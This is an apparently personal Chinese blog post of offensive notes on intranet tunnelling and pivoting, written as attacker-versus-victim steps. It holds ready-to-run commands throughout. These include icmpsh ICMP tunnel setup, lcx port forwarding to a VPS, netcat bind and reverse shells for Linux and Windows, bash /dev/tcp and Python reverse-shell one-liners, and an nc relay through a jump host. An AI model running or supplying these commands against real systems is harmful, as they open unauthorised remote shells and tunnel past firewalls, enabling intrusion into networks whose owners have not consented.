网络层隧道

一、网络层隧道

IPv6隧道
ICM隧道
  • ICMP隧道工具有PingTunnel,icmptunnel,icmpsh,powershell,icmp等

  • 常见ICMP隧道就是Ping命令
    攻击机A:

git clone https://github.com/inquisb/icmpsh.git           //下载icmpsh
apt-get install python-impacket                           //安装个库
sysctl -w net.ipv4.icmp_echo_ignore_all=1                 //设置参数icmpsh替代ping,1改为0就是不替代
./icmpsh_m.py 192.168.1.9 192.168.1.7                     //192.168.1.9外网地址(本机地址),192.168.1.7是内网防火墙服务器的外网IP

当不知到内网防火墙IP时,让内网机器Ping公网IP地址,通过数据包获取IP地址
公网(kali):tcpdump icmp
内网:ping

受害机:
icmpsh.exe -t 192.168.1.9 -d 500 -b 30 -s 128

二、传输层隧道

Lcx端口转发
  • A.内网端口转
    目标机器:lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389
    vps:lcx.exe -listen 4444 5555

  • B.本地端口映射
    lcx -tran 53 目标主机ip 3389

2、netcat

  • 正向shell:
nc -lvp 4444 -e /bin/sh      //linux下受害机
nc -lvp 4444 -e C:\WINDOWS\system32\cmd.exe      //windows下受害机

nc 192.168.1.11 4444 //攻击机主动连接受害机的4444端口

  • 反向shell
nc 192.168.11.144 9999 -e /bin/sh      //linux下受害机,去连接攻击机的9999端口
nc 192.168.11.144 9999 -e C:\WINDOWS\system32\cmd.exe      //windows下受害机,去连接攻击机的9999端口

nc -lvp 9999 //攻击机监听本地9999端口

三、NC反弹shell的几种方法

//bash反弹
bash -i >& /dev/tcp/ip/port 0>&1


//python反弹
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

四、内网代理

//攻击机监听本地1234端口
nc -lvp 1234

//受害机监听本地1234端口
nc -lvp 1234 -e /bin/sh

//跳板机,192.168.1.10是攻击机,1.1.1.200是受害机
nc -v 192.168.1.10 1234 -c "nc -v 1.1.1.200 1234"

posted @ 2020-11-22 10:59  lnterpreter  阅读(318)  评论(0)    收藏  举报